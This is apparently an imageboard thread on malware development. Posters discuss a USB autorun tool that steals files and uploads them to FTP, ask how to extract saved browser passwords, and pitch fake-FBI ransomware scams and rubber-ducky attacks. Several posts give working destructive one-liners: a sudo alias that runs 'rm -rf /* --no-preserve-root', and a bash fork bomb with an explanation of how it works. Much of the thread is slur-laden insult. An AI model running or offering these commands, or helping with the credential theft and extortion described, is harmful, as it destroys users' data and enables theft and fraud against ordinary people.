Malware Development

ITT: Malware Development general thread.

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I have developed a simple autorun (to put in pendrives) which can steal files easily and upload them to a ftp server.
I was thinking about modifying it to steal browser saved passwords. Did someone knows exactly how they work and how they're cryptographed?

Sorry for the typos, I'm almost sleeping here and english is not my native language.

Fuck off FBI

alias sudo=sudo rm -rf /* --no-preserve-root &&

Malware seems so redundant in an age where retards on Holla Forums can convince dozens of people to dunk their iphones underwater.


#!/bin/bashexec vivaldi#this script may be distributed under the terms of the Affero General Public License version 3.0 or, at the user's discretion, any higher version



:(){ :|: & };:


with all the webcams people have these days, why doesn't some hacker make viruses that are designed to get reaction videos from people? like the virus can threaten to do something horrible, or a screamer, who some shit like that, and then record their reaction and the screen.


This would fuck up a lot of people's phones in India


change your passwords to "pigfarm" if you don't want to be spied on

top pleb

Yeah, nah. Pretty sure you just want to delete other people's posts, amirite? :^)

Router/switch malware is where its at. Exploiting BGP and OSPF is how the big boys play the game.

I'm pretty sure the "big boys" crack encryption and data centers, not pleb tier routers.

more like spread ransomware and skim a couple bucks off grandpa and grandma

Maybe, certainly it's not routers.

No one gives two shits about routers.

Script kiddie DDOS I'm so anoneemoose faggots care about routers.

You have no fucking idea what you're talking about. I don't mean the shitty boxes people have next to their modems, i'm talking about the cisco/juniper boxes that keep the internet running.

Packet injection and MitM via forged CA root certificates is how hacking is done these days. It's also how the SWIFT banking system keeps getting owned for billions of dollars.

Windows doesn't let you autorun from thumb drive tho or I'm just dumb and don't know how to do it

It used to default to autorun and you could disable it by holding down shift while using it. They might have patched this because of the scourge of infected autorun drives.

Autoruns are desactivated by default, but they can still run if the person activated this option.


Economics. You gain more money by developing ransomware, than just shoving gore videos in peoples faces.

Not with CDs or DVDs (some ancient thumb/flash drives can emulate an optical drive).

You can either put it on a rubber ducky (shows up as a HID and types the script manually) or I saw one that emulates an optical drive that allows autorun. Dunno if that still works though.


Youtube revenue, possibly? Though if YT figured out the source, it'd get shut down quick.

Commit ritualistic suicide.

buttblasted windrone who got his WoW account stolen once takes his anger out on superior hackers who make more money in a week on the danknet than he does in a year

Someone make a worm that blocks the windows 10 botnet features.

faggot please, GNU would be just as targeted by hackers if it had greater that 1.1 percent market share, privilege escalation are being found every fucking day for Linux on Android


social engineering is on-topic


Wrong. Linux in general is more difficult to target simply due to the fact that there are so many different distributions. Something that works on Debian may not work on Slackware. What works on Fedora may not work on Arch, etc. Linux is more secure not because of the market share but because there are so many different distributions.

How about 85% of the server market share, 90% of the phone marketshare, and running the world economy?
I know it's just a bait post, but the fact is that windows is definitely a minority at this point. They're never going to win the phone market, they're never going to win the server market, and desktops/laptops are literalliy going nowhere but down in marketshare.

Anything that targets the kernel is usable across most, if not all, Linux distributions.

I think that inevitably you're right; that it would be hard to target a large swath of machines running Linux. But to say it's harder than on Windows is kind of silly. That would be like saying that a virus that targets the NT infrastructure wouldn't work across the grand majority of Windows machines.

Aren't servers and phones getting hacked all the time?

Aren't windows desktops getting hacked, ALL THE TIME?
Nowhere near, with the comparative footprint.

Windows has a larger userbase, thus is in general going to be more hacked simply by the numbers. Rather silly to make the comparison don't you think?

there are far more active systems using the linux kernel every day than windows will ever have again.
microsoft is fucked. they can only go down.

what does that actually do?

It's a fork bomb for OSX

A lot of hacking in general is from or user stupidity. Most phone users don't look at the permissions they give apps, and it's easy enough to make one that acts as ransomware. Hell, just have a web page that uses a browser exploit to set your homepage to it, and make it display some javascript that brings up a windows and says "This is the FBI, you've been caught downloading CP, pay the fine to this Paypal address" and you'll catch out loads of people.

When social engineering comes into play it doesn't matter what OS is being used, it will be fucked over.

It's a forkbomb. It defines a function that calls itself twice, then runs that function. Every instance of the function spawns 2 more instances, so it grows exponentially. After a bit your computer freezes because of all the processes.

Is there a Malware equivalent of the Idea Guy?


I can now attest that it also works on GNU/Linux.

Dunno about how to go around this, but how about making it a pandora's box/hydra type sort of thing; every time you disinstall one, it creates 2 more.

start d.bat

what language is that one written in?

Bash script

Most Linux-based server hacks consist of bruteforcing ssh passwords or exploiting outdated server software, which are both easy to avoid. Neither have anything to do with malware.

I used to develop malware 10 years ago, until I discovered everything was botnet. Now I don't really do anything seriously on computer.